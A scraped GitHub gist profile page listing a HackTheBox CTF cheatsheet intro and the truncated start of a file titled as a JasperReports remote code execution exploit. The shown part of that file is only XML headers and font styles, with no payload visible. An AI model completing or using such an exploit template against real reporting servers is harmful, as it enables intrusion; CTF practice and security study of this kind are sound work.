Skip to content

Instantly share code, notes, and snippets.

View IIIoKoLaDNeVCHEmneVinoVat's full-sized avatar
💭
I may be slow to respond.

IIIoKoLaDNeVCHEmneVinoVat

💭
I may be slow to respond.
View GitHub Profile
@IIIoKoLaDNeVCHEmneVinoVat
IIIoKoLaDNeVCHEmneVinoVat / htb.md
Last active February 3, 2021 13:48 — forked from AvasDream/htb.md
Cheatsheet for HackTheBox

Purpose

Cheatsheet for HackTheBox with common things to do while solving these CTF challenges.

Because a smart man once said:

Never google twice.

Linux General

@IIIoKoLaDNeVCHEmneVinoVat
IIIoKoLaDNeVCHEmneVinoVat / S2_Jasper_RCE.jrxml
Created December 7, 2018 02:33 — forked from v-p-b/S2_Jasper_RCE.jrxml
JasperReports Remote Code Execution with a single .JRXML file
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE jasperReport PUBLIC "-//JasperReports//DTD Report Design//EN" "http://jasperreports.sourceforge.net/dtds/jasperreport.dtd">
<jasperReport name="FirstJasper" columnCount="2" pageWidth="595" pageHeight="842" columnWidth="270" columnSpacing="15" leftMargin="20" rightMargin="20" topMargin="30" bottomMargin="30">
<style name="Arial_Normal" isDefault="true" fontName="Arial" fontSize="8" isBold="false" isItalic="false" isUnderline="false" isStrikeThrough="false" pdfFontName="Helvetica" pdfEncoding="Cp1252" isPdfEmbedded="false"/>
<style name="Arial_Bold" isDefault="false" fontName="Arial" fontSize="8" isBold="true" isItalic="false" isUnderline="false" isStrikeThrough="false" pdfFontName="Helvetica-Bold" pdfEncoding="Cp1252" isPdfEmbedded="false"/>
<style name="Arial_Italic" isDefault="false" fontName="Arial" fontSize="8" isBold="false" isItalic="true" isUnderline="false" isStrikeThrough="false" pdfFontName="Helvetica-Oblique" pdfEncoding="Cp1252" isPdfEmbedded="fa